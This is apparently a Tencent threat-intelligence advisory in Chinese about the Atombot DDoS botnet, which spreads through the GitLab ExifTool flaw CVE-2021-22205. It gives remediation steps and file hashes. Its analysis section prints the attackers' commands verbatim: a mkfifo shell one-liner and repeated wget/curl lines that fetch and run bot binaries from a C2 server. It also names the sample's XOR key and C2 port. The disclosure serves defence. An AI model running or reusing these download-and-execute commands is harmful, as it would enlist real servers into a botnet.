产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
警惕:DDOS僵尸网络Atombot正攻击云主机
2022-06-02 01:57:59
一、概述
腾讯安全威胁情报中心检测到,有攻击者使用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)对云主机展开攻击,若攻击成功会投递DDoS僵尸木马并连接C2,可控制肉鸡对互联网上的其他设备发起DDoS攻击,因其木马样本中硬编码了字符串“Atom_bot”,我们将其命名为Atombot僵尸网络。
Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205),未正确验证传递到GitLab文件解析器的图像文件可导致远程代码执行。由于 Gitlab 某些端点路径无需授权,攻击者可在无需认证的情况下利用图片上传功能执行任意代码。
Gitlab exiftool 远程命令执行漏洞是2021年4月披露并已修复的高危漏洞,CVSS评分为10(最高分),该漏洞一经出现,就得到众多网络黑产青睐,成为最常用的攻击武器之一。
腾讯安全专家强烈建议受影响的用户将GitLab升级到最新版本。下载链接:https://about.gitlab.com/update/
腾讯安全旗下安全产品已支持全面检测防御该漏洞的攻击利用:
腾讯T-Sec漏洞扫描服务、腾讯T-Sec主机安全(云镜)、腾讯容器安全服务(TCSS)已支持检测企业资产(主机、容器及镜像)是否存在Gitlab ExifTool远程命令执行漏洞(CVE-2021-22205);
腾讯T-Sec高级威胁检测系统(NTA,御界)、腾讯T-Sec 云防火墙、腾讯T-Sec Web应用防火墙(WAF)均已支持检测、拦截利用GitLab ExifTool远程代码执行漏洞的攻击活动;
腾讯T-Sec主机安全(云镜)已支持对Atombot相关僵尸网络木马样本的查杀清除。
二、分析
Atombot利用Gitlab exiftool漏洞攻击成功后执行脚本bins.sh:
sh -c TF=$(mktemp -u);mkfifo $TF && rm -rf bins.sh; rm -rf x86; rm -rf *.x86; wget http[:]//179.61.251.10/bins.sh; chmod 777 *; sh bins.sh 0<$TF | sh 1>$TF
脚本下载包括针对x86、mips、arm等CPU架构的样本:
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm7; curl http[:]//179.61.251.10/bins/flow.arm7 -O flow.arm7; chmod 777 flow.arm7; ./flow.arm7 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm6; curl http[:]//179.61.251.10/bins/flow.arm6 -O flow.arm6; chmod 777 flow.arm6; ./flow.arm6 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm5; curl http[:]//179.61.251.10/bins/flow.arm5 -O flow.arm5; chmod 777 flow.arm5; ./flow.arm5 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.arm; curl http[:]//179.61.251.10/bins/flow.arm -O flow.arm; chmod 777 flow.arm; ./flow.arm exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.x86; curl http[:]//179.61.251.10/bins/flow.x86 -O flow.x86; chmod 777 flow.x86; ./flow.x86 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.mips; curl http[:]//179.61.251.10/bins/flow.mips -O flow.mips; chmod 777 flow.mips; ./flow.mips exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.mpsl; curl http[:]//179.61.251.10/bins/flow.mpsl -O flow.mpsl; chmod 777 flow.mpsl; ./flow.mpsl exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.spc; curl http[:]//179.61.251.10/bins/flow.spc -O flow.spc; chmod 777 flow.spc; ./flow.spc exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.sh4; curl http[:]//179.61.251.10/bins/flow.sh4 -O flow.sh4; chmod 777 flow.sh4; ./flow.sh4 exploit
cd /tmp; wget http[:]//179.61.251.10/bins/flow.m68k; curl http[:]//179.61.251.10/bins/flow.m68k -O flow.m68k; chmod 777 flow.m68k; ./flow.m68k exploit
以flow.x86为例进行分析,样本除了“Atom_bot”外,其余关键字符串均被加密。
启动后会先检查有无参数,没有参数直接退出。然后将内置的加密数据依次与0d f0 ad ba进行异或得到解密后的字符串。
解密并打印字符“aisu_bot[Killing”,然后使用随机字符串隐藏进程名。
读取硬编码在代码中的IP地址和端口作为C2连接,C2地址为179.61.251.10:420。
通过调用Linux系统第102号(0x66)syscall进入socketcall(),并且通过参数3定位执行conncet网络连接函数。
Linux系统调用表:
系统调用入口socketcall()中不同参数对应不同的系统函数,木马通过调用sys_socket,sys_connect,sys_getsockname,sys_send,sys_recv等函数实现与C2地址的网络通信。
连接成功后,被控端首先发送4个字节上线请求,然后发送8个字节的参数” .exploit”,控制端返回数据后,解密出命令并退出进程或执行DDoS攻击等操作。
木马向控制端发送和返回心跳包:
三、安全建议及处置手册
腾讯安全专家建议企业用户参考以下方法排查风险,消除威胁。
1.通过腾讯主机安全(云镜)扫描排查主机是否存在流行高危漏洞,及时根据提示信息修复相关漏洞;
主机安全(云镜)控制台:打开漏洞管理->Web应用漏洞管理,点击一键检测
查看扫描到的Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)风险项目。
确认存在Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的资产IP。运维人员登录该资产,将Gitlab升级到最新版本。
回到腾讯主机安全(云镜)控制台再次打开“漏洞管理”,重新检测,确保已修复漏洞的资产IP已不再被检测到。
2.配置腾讯云防火墙对恶意利用Gitlab exiftool 远程命令执行漏洞(CVE-2021-22205)的攻击进行防御:
在腾讯云防火墙控制台界面,打开入侵防御设置即可。
3.建议配置使用强密码进行登陆验证,不使用弱密码或默认密码。
推荐通过腾讯云防火墙配置微信扫码登录主机,避免因操作人员帐号密码泄露导致黑客远程登录,或遭遇弱密码爆破攻击;
详细操作步骤可参考“腾讯云防火墙运维实例:远程登录”(https://cloud.tencent.com/document/product/1132/53012)
4.检测发现感染僵尸木马程序后,及时清除恶意样本,以彻底消除威胁。
通过腾讯主机安全(云镜)控制台,入侵检测->文件查杀,检测全网资产,在资产列表右侧输入资产IP地址,检测恶意文件,发现后一键隔离操作。操作步骤:
A: 主机安全(云镜)控制台:入侵检测->文件查杀,选择一键检测:
B:弹出一键检测设置,选择快速扫描,勾选“全部专业版主机”,开启扫描:
C:查看扫描出的木马风险结果项
D:对Atombot僵尸网络木马进行一键隔离(注意勾选隔离同时结束木马进程选项)
IOCs
MD5
99e95e15ed161cf4a5ff8167de5f495f
89b0666a5656ab7407a67e5af8cf9b6f
e55082237c555b2f3f1cc55eca27a8fe
6dca32a8ce6f0dc667c39c299714680b
a04e168cd4523b2aaf2271cccfdc5597
参考链接:
https://mp.weixin.qq.com/s/Xzz_3VYFGi7hFHBplOOLZQ
https://cocomelonc.github.io/tutorial/2021/10/17/linux-shellcoding-2.html
扫描以下二维码关注“腾讯安全威胁情报中心”公众号,掌握最新的网络安全威胁情报。
在线咨询
方案定制